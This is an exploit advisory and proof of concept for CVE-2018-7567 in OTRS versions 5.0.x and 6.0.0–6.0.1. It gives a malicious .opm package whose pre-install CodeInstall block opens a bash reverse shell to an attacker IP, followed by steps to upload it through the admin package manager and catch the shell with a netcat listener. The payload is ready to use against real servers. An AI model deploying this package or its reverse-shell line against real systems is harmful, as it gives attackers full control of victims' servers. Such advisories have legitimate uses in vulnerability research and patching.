# Exploit Title: OTRS Authenticated file upload 
# Date: 03-03-2018
# Exploit Author: Ali BawazeEer 
# Vendor Homepage: https://www.otrs.com/
# Software Link: http://ftp.otrs.org/pub/otrs/
# Version:5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1
# Tested on: OTRS 5.0.2/CentOS 7.2.1511
# CVE : CVE-2018-7567

# Vulnerability Description: 
authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted malicious opm file with an embedded codeinstall tag to execute a command on the server during package installation.
aC/	Proof opm file to upload 

<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>
	<BuildDate>2016-09-23 11:17:41</BuildDate>
	<BuildHost>opms.otrs.com</BuildHost>
	<Framework>5.0.x</Framework>
	<IntroInstall Lang="en" Title="My Module" type="pre">
		&lt;br&gt;
		Hello wolrd
		&lt;br&gt;
		((Hello!))
		&lt;br&gt
	</IntroInstall>
	<CodeInstall type="pre">
		print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &);
	</CodeInstall>
	<CodeInstall Type="post">
		# create the package name
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content};
		$Kernel::OM-&gt;Get($ModeModule)-%gt;CodeInstall();
	</CodeInstall>
	<CodeUninstall type="pre">
		my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content};
		$Kernel::OM-&gt;Get($CodeModule)-&gt;CodeUninstall();
	</CodeUninstall>
</otrs_package>


-	Steps:
-	Go to package manager from administrator panel 
-	Save the above code in opm file and upload it as package  
-	change the ip address to your attacking machine and setup netcat listener 



# =================================================EOF =======================================================
#
#
# Risk : attackers are able to gain full access to the server  after uploading malicious opm file 
# and thus have total control over the web server , 
#
# Vulnerability Limitation : Admin access needed to escalate the privilege from application level to control the server 
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained 
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer